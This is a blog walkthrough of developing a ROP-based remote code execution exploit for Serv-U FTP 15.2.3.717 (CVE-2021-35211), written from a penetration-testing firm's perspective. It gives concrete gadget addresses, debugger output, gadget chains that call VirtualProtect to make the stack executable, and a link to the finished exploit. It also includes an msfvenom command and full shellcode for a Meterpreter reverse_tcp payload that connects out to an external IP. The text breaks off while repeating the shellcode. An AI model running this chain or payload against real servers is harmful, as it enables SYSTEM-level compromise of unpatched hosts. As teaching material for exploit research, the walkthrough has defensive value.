# Walkthrough of Creating an Exploit for CVE-2021-35211

## Background
As part of our work on the [Cosmos platform](https://bishopfox.com/platform) (formerly known as CAST) we sometimes have a requirement to weaponize vulnerabilities in order to achieve specific customer requirements. In this case we were asked "can you guys write an exploit for this?" and we were happy to oblige.

## The Vulnerability
In this blog, I'd like to share some of the thought process behind creating a ROP-based exploit for Serv-U FTP v15.2.3.717 on modern Windows systems. I'm not going to cover the root cause of the vulnerability here because the Microsoft research team did a good job of it in their [blog post](https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/). Please read that article first and then come back here if you're interested in how we arrived at the point of NattySamson's PoC and our subsequent exploit. 

We pick up at the point where Natty's PoC gives us a semi-reliable way to populate the `r9` register with an attacker-supplied value that is subsequently used by a `call r9` instruction. This gives us a way to control `rip` and theoretically execute arbitrary code in the context of Serv-U, which typically runs as a service as `NT AUTHORITY\System`.

We'll keep the tooling simple. If you want to play along you'll need:

* **A disassembler**. In this example I used [Hopper Disassembler](https://www.hopperapp.com/), but IDA Pro, Ghidra, or anything else will do.
* **Radare2**. The Swiss army knife of assembly language! Get it from the [Radare2 website](https://rada.re/).
* **WinDBG**. I used WinDBG on Windows Server 2022 Datacenter, you can get it [here](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools).
* **Proof-of-Concept code**. The exploit I wrote is based on the PoC written by [NattiSamson](https://github.com/NattiSamson). The original code is here: [PoC](https://raw.githubusercontent.com/NattiSamson/Serv-U-CVE-2021-35211/main/CVE-2021-35211_PoC.py).
* **Serv-U-FTP v15.2.3.717**. Download it from the [Serv-U Download page](https://downloads.solarwinds.com/solarwinds/Release/SU/15.2.3/SU-FTP-Server-Windows-v15.2.3.zip).
* **Python 3**. Python 2 will probably work with some tweaks.

Note that I am *not* using [Mona](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/) or other such tools to automate the exploit development process. I'm doing a lot of this manually to better demonstrate the steps involved in writing ROP exploits; perhaps in a later blog post I'll go over how to do this with automation tooling like Mona. 

If you don't care about the technical details and just want to grab the exploit, it's available [here](https://github.com/0xhaggis/CVE-2021-35211).

## Summarizing the Exploit Development
I started with NattiSamson's PoC that triggered the bug in Serv-U and placed a user-controllable value into `rip` via a `call r9` instruction. `r9` is a QWORD (8-byte / 64-bit) register, the contents of which can be controlled by passing a carefully constructed malicious payload during the initial SSH cryptographic handshake with Serv-U.

Let's break the exploit development down into chunks. This will be a [ROP exploit](https://hovav.net/ucsd/talks/blackhat08.html) and loosely gets constructed like so:

1. Figure out what address to put into `r9` in order to kickstart code execution
2. Defeat ASLR to enable the above
3. Pivot the stack pointer `rsp` to point at the ROP chain in our payload
4. Find the address of the function `kernel32.dll!VirtualProtect`, which I'll use to make the stack executable (RWX)
5. Identify useful ROP gadgets to do (4)
6. Build a ROP chain that calls `VirtualProtect` to change the stack's page protection from R-X to RWX
7. Reset the stack/registers to pre-exploit values (if necessary and feasible)
8. Add ROP gadgets to jump to shellcode on the newly executable stack

I may or may not stick to that order!

### Where to Jump? ASLR? Stack Pivot?
The first three above points are all intertwined, so I'll deal with them at the same time. The question is: What memory address should I put into `r9` in order to kickstart our ROP chain exploit? I must solve for:

* The stack pointer `rsp` *must* point to our ROP chain before the `call r9` returns with a `ret` instruction. This is because of the way `ret` works. Think of the `ret` instruction as an equivalent of `pop rax ; jmp rax` or more simply, `pop rip`, both of which pop a 64-bit address off the stack and jump to it. If you control the stack, you control the return address of every `ret` instruction in the future. 
* In other words: if `rsp` doesn't point to our ROP chain by the time `ret` is called, I'm hosed.
* Unfortunately, `rsp` does *not* point to our ROP chain at the time of the PoC's `call r9`, so our first ROP gadget *must* populate `rsp` with the address of our payload/ROP chain buffer and then call `ret`.
* Due to ASLR, most memory addresses will be different every time Serv-U is launched. I must find static addresses, at least until I get a proper foothold to query the runtime dynamically.

Whew. Tricksy. Fortunately the stars aligned on this bug and it's pretty easy to work around these problems. First up: ASLR. I can't do anything until I've worked around address space randomization.

### ASLR
I can't stack pivot or reliably jump to a useful instruction or pivot to a ROP chain until I've found useful non-ASLR predictable, repeatable addresses. 

The first thing to do is see if `Serv-U.exe` or any of the bundled DLLs are compiled without ASLR support. The tool for the job is NetSPI's `PESecurity`, available from https://github.com/NetSPI/PESecurity. It's a PowerShell script that scans executable files for security flags and produces a concise report, like so:

```
PS C:\Users\Administrator\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\Administrator\Desktop> Get-PESecurity -directory 'C:\Program Files\RhinoSoft\Serv-U' -recursive

FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoNET.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoRES.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-RES.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Setup.exe
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : True
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Tray.exe
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : True
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\zlib1.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True
```

Holy smokes, that's a lot of non-ASLR binaries! For shame, SolarWinds. This means that `Serv-U.dll`, etc. will *always* be loaded into the same memory addresses, which means that I have reliable addresses from which to harvest ROP gadgets. 

### Stack Pivot
As mentioned before, the stack pointer `rsp` doesn't point to our exploit payload buffer at the time `call r9` happens. This breaks everything because once the `r9` function calls `ret` the CPU will pop the return address off the stack at the address in `rsp` and `jmp` to it. In other words, execution resumes as normal. I can control `r9` and therefore control where the `call` jumps to, but I can't control where it returns to; I have to find a way to point `rsp` at our payload and return to our ROP chain using only a single ROP gadget. 

It turns out that our payload is actually stored at the address stored in `rbp`. How do I know that? By examining the registers and the stack in a debugger at the point `call r9` is executed by the CPU. 

First the registers:
```
0:008> r
00 0000000d`09bfebf0 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
rax=0000000000000010 rbx=000001ed4d497f00 rcx=000001ed4d9126b8
rdx=000001ed4d9126c8 rsi=ffffffffffb627a8 rdi=0000000000000000
rip=00000000720b9636 rsp=0000000d09bfebf0 rbp=000001ed4d5a410a
 r8=000001ed4d497f00  r9=4141414141414100 r10=000001ed4d497f00
r11=000001ed4d5a40fa r12=000001ed4d9126c8 r13=0000000000000001
r14=ffffffffffc91a32 r15=000001ed4d474e80
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
```

We can see that the stack pointer and base pointers are nowhere near each other:
```
rsp = 0x00d09bfebf0
rbp = 0x1ed4d5a410a
```

There was nothing of our payload at `rsp`'s memory address, but what about `rbp`?
```
0:013> db @rbp l128
00000253`5badfa9a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaaa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaca  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfada  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaea  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfafa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb0a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb1a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb2a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb3a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb4a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb5a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb6a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb7a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb8a  41 41 41 41 41 41 41 41-00 00 00 00 00 00 00 00  AAAAAAAA........
00000253`5badfb9a  00 00 00 00 00 00 00 00-00 00 00 00 00 00 73 92  ..............s.
00000253`5badfbaa  bf a1 35 03 00 90 b8 34-5a 90 ff 7f 00 00 70 34  ..5....4Z.....p4
00000253`5badfbba  5a 90 ff 7f 00 00 00 22                          Z......"
```

Bingo! So first order of the day is to move the address in `rbp` to `rsp`. To do that I need a ROP gadget that does something like:

```
mov rsp, rbp 
ret
```

It's rarely that easy, but that's where we start. Using Radare2 to search for ROP gadgets is simple, particularly on architectures that allow unaligned memory accesses like Intel x64 that help us to find gadgets that aren't even part of the compiled code. It's a cool concept, check it out. Consider the following code:

```
0x18005d485               498be3  mov rsp, r11
0x18005d488                   5d  pop rbp
0x18005d489                   c3  ret
```

The first instruction, `mov rsp, r11`, takes up three bytes `\x49\x8b\xe3` and starts at address `0x18005d485`. Therefore the next instruction is at an address 3 bytes higher at `0x18005d488`.

But what if I set the instruction pointer to address `0x18005d486`, which is between the two "valid" instruction addresses? The opcodes would be `\x8b\xe3\x5d\xc3`, which is a completely different set of instructions. You can use Radare2 to disassemble these opcodes like so:

```
% rasm2 -a x86 -b 64 -d 8be35dc3
mov esp, ebx
pop rbp
ret
```

Well, look at that! A completely different gadget. You can ask Radare2 to perform gadget searches byte-by-byte to uncover all possible permutations of instructions by using the `"/ad/a "` command like this:


```
% r2 Serv-U.dll
 -- Ask not what r2 can do for you - ask what you can do for r2
[0x1801a4184]> "/ad/a mov rsp;ret;"
[0x1801a4184]>
```

The above command `"/ad/a mov rsp;ret"` tells Radare2 to scan the `Serv-U.dll` file for instructions that match a `mov` followed by a `ret`, and in which the `mov` instruction is writing *something* to the rsp register. Each of the stacked query terms are separated by semicolons and are expected to be regexes; the entire command must be inside double-quotes.

Sadly for us, the above Radare2 search returned no results. Ok, let's try to find a gadget that has some kind of `mov rsp, .*`, then any other instruction, and then a `ret`:

```
[0x1801a4184]> "/ad/a mov rsp;.*;ret;"
0x180059ffb               498be3  mov rsp, r11
0x180059ffe                   5d  pop rbp
0x180059fff                   c3  ret
0x18005d485               498be3  mov rsp, r11
0x18005d488                   5d  pop rbp
0x18005d489                   c3  ret
0x18005d986               498be3  mov rsp, r11
0x18005d989                   5d  pop rbp
0x18005d98a                   c3  ret
0x18005fa9a               498be3  mov rsp, r11
0x18005fa9d                 415e  pop r14
0x18005fa9f                   c3  ret
0x180063a5a               498be3  mov rsp, r11
0x180063a5d                   5f  pop rdi
0x180063a5e                   c3  ret
0x180064795               498be3  mov rsp, r11
0x180064798                   5f  pop rdi
0x180064799                   c3  ret
...omitted for brevity...
0x180196569               498be3  mov rsp, r11
0x18019656c                   5f  pop rdi
0x18019656d                   c3  ret
0x1801a167f               498be3  mov rsp, r11
0x1801a1682                   5f  pop rdi
0x1801a1683                   c3  ret
```

That's a LOT of matching gadgets! Remember, I want to put the address of our payload into `rsp`. Let's rule out any gadgets where `rbp` is popped off the stack - I'd like to avoid messing with more stack registers than absolutely necessary. I don't care if `rdi` gets messed up, so those gadgets could be useful so long as `r11` points to the location of our payload buffer on the stack. 

To check `r11`'s value I used WinDBG to attach to the Serv-U process and compare the value of `rbp` against `r11` at the time `call r9` is executed by the exploit:

```
(1c60.1c04): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
0:013> r
rax=0000000000000010 rbx=0000020058925d20 rcx=0000020058d1d688
rdx=0000020058d1d698 rsi=ffffffffffb5ee68 rdi=0000000000000000
rip=00000000720b9636 rsp=0000009dd2aff320 rbp=0000020058648b3a
 r8=0000020058925d20  r9=4141414141414141 r10=0000020058925d20
r11=0000020058648b2a r12=0000020058d1d698 r13=0000000000000001
r14=ffffffffff92b492 r15=000002005887c510
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
0:013>
```

We can see that:

```
rbp=0000020058648b3a
r11=0000020058648b2a
```

What good fortune! The `r11` register points at an address 16 bytes up from `rbp`, which points exactly at our payload buffer. I can use the newly identified ROP gadget to perform the stack pivot, pop eight bytes off the "stack" (which is really our payload) into `rdi`, and then pop the next bytes off the stack into `rip`; given that I control the new stack, I therefore control the value of `rip`, which means I now have a means to pivot the stack and continue execution from our ROP chain.

I chose the gadget address of `0x18010391a` from those found by Radare2. It became the value placed into the payload buffer as our first ROP gadget address.

### Executing Shellcode: Find `Kernel32!VirtualProtect`
Now that I've pivoted the stack to our ROP buffer, I need to set up the conditions for executing shellcode. Step one: Make the memory pages in which our shellcode is stored readable, writable, and - most importantly - *executable.* Our shellcode is on the stack in our payload buffer, so that's what I need to make executable.

The function `VirtualProtect` is used to change the protection flags for regions of memory, which lets us set the stack to executable (RWX). I checked the import table of `Serv-U.dll`, but it didn't import `VirtualProtect`, so the easiest way of getting the correct address (direct reference) wouldn't work. Instead I have to use native Windows functions to derive the address by calling the equivalent of `GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect")`.

We can see from the disassembler's import tables (Navigation / Imported Symbols in Hopper) that `Serv-U.dll` imports `GetModuleHandleW` from `kernel32.dll`:

![](https://i.imgur.com/1sq1NTs.png)

It also imports `GetProcAddress`:

![](https://i.imgur.com/AEOxxhm.png)

The address `0x1801c92c8` is a trampoline stub built into `Serv-U.dll` that, when jumped to, redirects execution to the real `kernel32!GetModuleHandleW` that's been mapped into Serv-U's process space by the operating system's library loader. The same applies for `0x1801c9590` and `kernel32!GetProcAddress`. In other words, the value stored at address `0x0x1801c92c8` is a pointer to the real `GetModuleHandleW` function. 

Let's dereference it in the debugger and double-check that it matches the real address of `GetModuleHandleW` in this context. First, dereference the trampoline in `Serv-U.dll`:

```
0:026> u poi(0x1801c92c8)
KERNEL32!GetModuleHandleWStub:
00007ffd`19e4ce40 48ff2559370600  jmp     qword ptr [KERNEL32!_imp_GetModuleHandleW (00007ffd`19eb05a0)]
00007ffd`19e4ce47 cc              int     3
```

Awesome. Does the same apply to `GetProcAddress`?

```
0:026> u poi(0x1801c9590)
KERNEL32!GetProcAddressStub:
00007ffd`19e4a780 4c8b0424        mov     r8,qword ptr [rsp]
00007ffd`19e4a784 48ff25bd510600  jmp     qword ptr [KERNEL32!_imp_GetProcAddressForCaller (00007ffd`19eaf948)]
00007ffd`19e4a78b cc              int     3
```

Yes indeed! That has saved us a lot of hassle and I can write the ROP chain the "easy" way by calling known pointers to access the functions needed to locate `VirtualProtect.' In order to call the necessary functions I'll need to find some ROP gadgets the provide the necessary functionality. 

### Identify ROP gadgets
I started by sketching out a rough plan of what I wanted to achieve.

* Stack pivot
* Set up the parameter needed when calling `moduleHandle = GetModuleHandleW(L"kernel32.dll")`
* Call it
* Set up the two parameters needed when calling `VirtualProtect = GetProcAddress(moduleHandle, "GetProcAddress")`
* Call it
* Set up the four parameters required for `VirtualProtect(stackAddress, size, attributes, &results)`
* Call it
* Load the address of our payload buffer's NOP sled + shellcode
* Restore the pre-exploit stack frame
* Jump to the shellcode 

It takes a bit of trial and error to build up the gadget chain because we're often limited to less-than-perfect gadgets. So I spent some time finding useful gadgetry. What constitutes "useful?" Here's a few ideas:

* Simple and short. E.g. `mov rax, rbx ; ret` is much better than `mov rax, rbx; mov rax, qword ptr [rax+10h]; pop rcx; ret` because the latter stomps on the values we want and it also messes with the stack due to the `pop` instruction. Simple is good in ROP. But if we can't find "perfect" gadgets (i.e. those that perform *only* the desired operation and a `ret`) then we have to settle for gadgets with extra baggage.
* Manipulation of argument-passing registers on x64. Gadgets that allow us to `pop` values off the stack into the four argument-passing registers (`rcx`, `rdx`, `r8`, and `r9`, respectively) are super useful for calling into functions. So for example these gadgets are solid gold:
    * `pop rcx ; ret`
    * `pop rdx ; ret`
    * `pop r8 ; ret`
    * `pop r9 ; ret`
* In this exploit there was no `pop r9` gadget available. Instead, I looked for the smallest possible non-perfect gadgets to load another register with the desired value and swap it into the `r9` register, like so:
    * `pop rax ; xchg r9, rax ; ret`
* Flow control gadgets like `jmp rax ; ret` or `call rbx ; ret` can be chained together like so:
    * `pop rax` followed by
    * `jmp rax` or `jmp qword ptr [rax]`
* Gadgets that dereference the registers are super useful when bouncing off trampolines like the ones I have for `GetModuleHandleW` and `GetProcAddress`. For example:
    * `mov rax, qword ptr [rax]`. Reads the value at the memory address in `rax` and stores it in the `rax` register.
    * For example, if `rax=0x123456789` then the above instruction reads the 8 bytes at memory address `0x123456789` and stores that value in the `rax` register.

I spent some time collecting gadgets and then used them to construct a real ROP chain. Sometimes it doesn't work out and you need to spend forever thinking up alternative ways of doing the job. For example, I spent *hours* trying to find an easy way to put arbitrary values in the `r9` register when calling into `VirtualProtect`. Eventually I settled on a two-gadget chain that populated `r9` via `rax`, like so:

```
# Gadget 1
pop rax         # we control the stack, so we can control the value popped into rax
ret

# Gadget 2
xchg rax, r9    # tadaaaa
adc al, 0       # Effectively a NOP without consequences
add rsp, 0x38   # Effectively a NOP with consequences: stack pointer increases by 0x38 bytes.
ret             # The address popped off the stack by the ret instruction needs to be 0x38 bytes further up our payload/stack than it normally would be. 
```

The double-gadget was a compromise because I really didn't want to have 0x38 bytes of my payload eaten up by `add rsp, 0x38`, but it did the job and was the best I had, so I went with it.

### Call GetModuleHandleW
The `GetModuleHandleW` function is defined as:

```
HMODULE GetModuleHandleW(
  [in, optional] LPCWSTR lpModuleName
);
```

It returns a pointer (aka "handle" in Microsoft terminology) to specify the module (DLL, executable, etc) in memory. The pointer literally points to a complete DLL in memory if it's loaded. The name of the module must be specified as a "wide" string, which uses 16 bits per character instead of ASCII's eight bits per character. For example:

ASCII:
```
"kernel32" = \x6b\x65\x72\x6e\x65\x6c\x33\x32
```

Wide String:
```
"kernel32" = \x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\x00"
```

Handily enough, there is a wide string version of `kernel32` in the `Serv-U.dll` binary! It's located at `0x180313230`, as shown here in Hopper:

![](https://i.imgur.com/ExQmzI2.png)

Note that it's denoted as type `dw`, which is a wide string. Checking the result in the hex editor confirms that this is really a wide string:

![](https://i.imgur.com/lAcWzXn.png)

Excellent. All it takes to call `GetModuleHandleW(L"kernel32.dll")` is the following pseudo-code:

```
pop rcx         # We place the value 0x180313230 (address of kernel32 string) on the stack to be popped into rcx
pop rax         # We place the value 0x1801c92c8 (address of GetModuleHandleW trampoline) on the stack to be popped into rax
jmp [rax]       # Dereference rax and jump to the resulting address, which is the real address of GetModuleHandleW
mov rcx, rax    # Save the returned handle in rcx for later
```

The handle for `kernel32.dll` is returned in the `rax` register, which we can save for later use. In the exploit I save it into a writable area of memory in Serv-U's `.data` segment that I treat as a scratchpad for "variables" that hold data temporarily.

### Call GetProcAddress
The `GetProcAddress` function is defined as:

```
FARPROC GetProcAddress(
  [in] HMODULE hModule,
  [in] LPCSTR  lpProcName
);
```

The first parameter is the handle I obtained from `GetModuleHandleW`. The second is the name of the function I want to find: `VirtualProtect`. This time the string is expected to be ASCII, not wide. Unfortunately, there is no NULL-terminated "VirtualProtect" string in the Serv-U binaries, so I need to create my own using the stack. 

The first step is to find a writable memory address in Serv-U's `.data` segment to which I can write a string. I used Hopper to look through the data segment for a section that was not cross-referenced to any code; the assumption is that the memory area is truly unused. Pseudo-code is as follows: 

```
# Write "VirtualProtect\x00\x00" (16 bytes) to an unused address in .data
# Split the task so that two 8-byte chunks are written consecutively.

pop rdx         # An unused address in Serv-U's data segment gets popped into rdx. 
pop rax         # Pop the value 0x506c617574726956 ("VirtualP" little-endian) off the stack.
mov [rdx], rax  # Write "VirtualP" to the first 8 bytes of our .data memory chunk.

pop rdx         # Pop the address of the next 8 bytes of .data memory into rdx. 
pop rax         # Pop "rotect\x00\x00" off the stack into the rax register.
mov [rdx], rax  # Append "rotect\x00\x00" to our memory chunk, making a complete "VirtualProtect\x00\x00" string.
```

Now I can call `GetProcAddress`:

```
# Assume rcx contains the value returned by GetModuleHandleW, the handle to kernel32.dll
# Assume rdx contains the address of the string "VirtualProtect\x00"
pop rax         # Pop 0x1801c9590 off the stack (the address of the GetProcAddress trampoline)
jmp [rax]       # Jump to GetProcAddress(handle, "VirtualProtect\x00")
# The address of the VirtualProtect function is returned in rax
```

Phew! I now have the address of `VirtualProtect` in `rax`.

### Calling VirtualProtect
The `VirtualProtect` function is defined as:

```
BOOL VirtualProtect(
  [in]  LPVOID lpAddress,       # Starting address of memory to make executable (rounded down to nearest 4k page boundary).
  [in]  SIZE_T dwSize,          # Number of bytes to make executable (rounded up to nearest 4k page boundary).
  [in]  DWORD  flNewProtect,    # Protection flags. In this case 0x40 = RWX.
  [out] PDWORD lpflOldProtect   # Return results in this variable. Must be a writable memory address!
);
```

Remember that the parameters are passed to this function in the `rcx`, `rdx`, `r8`, and `r9` registers, respectively. In this case:

```
rcx = Address of our payload buffer (i.e. the current stack address)
rdx = 0x2000 (8kB or two 4k memory pages)
r8  = 0x40 (readable, writable, executable)
r9  = Address from .data segment of Serv-U
```

The second and third parameters are dead easy: Just pop them off the stack!

```
pop rdx         # Pop 0x2000 off the stack
pop r8          # Pop 0x40 off the stack
```

Getting the last argument is slightly trickier because we have no `pop r9` gadget to work with; instead the compound gadget is used:

```
# 1st gadget
pop rax         # Pop writable address off the stack into rax
ret

# 2nd gadget
xchg rax, r9    # Swap rax and r9 so that r9 now contains the writable address
adc al, 0       # Extra crap instruction does effectively no operation
add rsp, 0x38   # This part of the gadget moves the stack pointer up 0x38 bytes. 
                # We account for this in our exploit by skipping 0x38 bytes of our 
                # payload buffer before writing the next value to the buffer.
ret             # Return to the next gadget
```

Finally I populate the first parameter: the address of our stack. The gadgets aren't perfect for this operation, but they work:

```
# 1st gadget
push rbp                # Push an address near our stack onto the head of the stack.
pop rax                 # Pop the address off the stack into rax so that rax now contains the address of the stack.
add byte ptr [rax], al  # Effective no operation in this context
ret                     # Return to next gadget

# 2nd gadget
mov rcx, rax            # Put the (approximate) address of the stack into rcx
ret
```

At this point I have populated the registers and I just need to call `VirtualProtect` to make our shellcode executable:

```
# Assuming we have address of VirtualProtect's trampoline in rax
jmp [rax]
ret
```

And that's it! The part of the stack on which our shellcode resides is now executable.

### Shellcode
I took standard shellcode generated by `msfvenom` and patched it at exploit runtime to do my bidding. For example, consider the Metasploit-compatible shellcode stager. It's generated like so:

```
[2021-10-19T18:47:49Z] root@h:/ehome/haggis# msfvenom  -p windows/x64/meterpreter/reverse_tcp LHOST=192.153.76.22 LPORT=443 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x01\xbb\xc0\x99\x4c\x16\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
```

The IP address to which the shellcode connects to download the second-stage shellcode is at these offsets:

```
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
